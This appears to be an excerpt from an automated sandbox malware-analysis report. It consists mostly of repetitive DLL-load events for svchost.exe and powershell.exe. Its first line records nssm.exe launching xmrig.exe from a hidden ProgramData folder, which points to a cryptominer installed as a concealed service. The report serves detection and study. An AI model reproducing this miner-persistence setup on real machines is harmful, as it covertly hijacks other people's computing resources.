                    Source: C:\ProgramData\.logstxt\nssm.exeProcess created: C:\ProgramData\.logstxt\xmrig.exe "C:\ProgramData\.logstxt\xmrig.exe" xmrig.exe -B -c config.json
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
